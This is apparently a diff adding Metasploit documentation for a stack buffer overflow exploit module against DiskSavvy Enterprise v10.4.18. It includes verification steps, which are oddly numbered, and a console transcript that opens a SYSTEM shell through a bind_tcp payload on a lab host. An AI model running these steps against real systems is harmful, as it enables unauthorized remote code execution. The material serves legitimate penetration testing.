Disk Savvy Server Buffer Overflow Documentation

Author: DanielRTeixeira

documentation/modules/exploit/windows/misc/disk_savvy_adm.md

@@ -0,0 +1,39 @@
+## Vulnerable Application
+
+[DiskSavvy Enterprise](http://www.disksavvy.com/) version v10.4.18, affected by a stack-based buffer overflow vulnerability caused by improper bounds checking of the request sent to the built-in server which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target.. This module has been tested successfully on Windows 7 SP1 x86. The vulnerable application is available for download at [DiskSavvy Enterprise](http://www.disksavvy.com/setups/disksavvyent_setup_v10.4.18.exe).
+
+## Verification Steps
+    1. Install a vulnerable DiskSavvy Enterprise
+  6. Start `msfconsole`
+    3. Do `exploit/windows/misc/disk_savvy_adm`
+    4. Do `set RHOST ip`
+    5. Do `set PAYLOAD windows/shell/bind_tcp`
+  13. Do `exploit`
+    7. Enjoy you shell
+
+## Scenarios
+
+###DiskSavvy Enterprise v10.4.18 on Windows 7 SP1 x86
+
+```
+msf > use exploit/windows/misc/disk_savvy_adm 
+msf exploit(windows/misc/disk_savvy_adm) > set RHOST 192.168.216.55
+RHOST => 192.168.216.55
+msf exploit(windows/misc/disk_savvy_adm) > set payload windows/shell/bind_tcp
+payload => windows/shell/bind_tcp
+msf exploit(windows/misc/disk_savvy_adm) > exploit 
+
+[*] Started bind handler
+[*] Encoded stage with x86/shikata_ga_nai
+[*] Sending encoded stage (267 bytes) to 192.168.216.55
+[*] Command shell session 1 opened (192.168.216.5:36113 -> 192.168.216.55:4444) at 2018-02-14 15:19:02 -0500
+
+Microsoft Windows [Version 6.1.7601]
+Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
+
+C:\Windows\system32>whoami      
+whoami
+nt authority\system
+
+C:\Windows\system32>
+```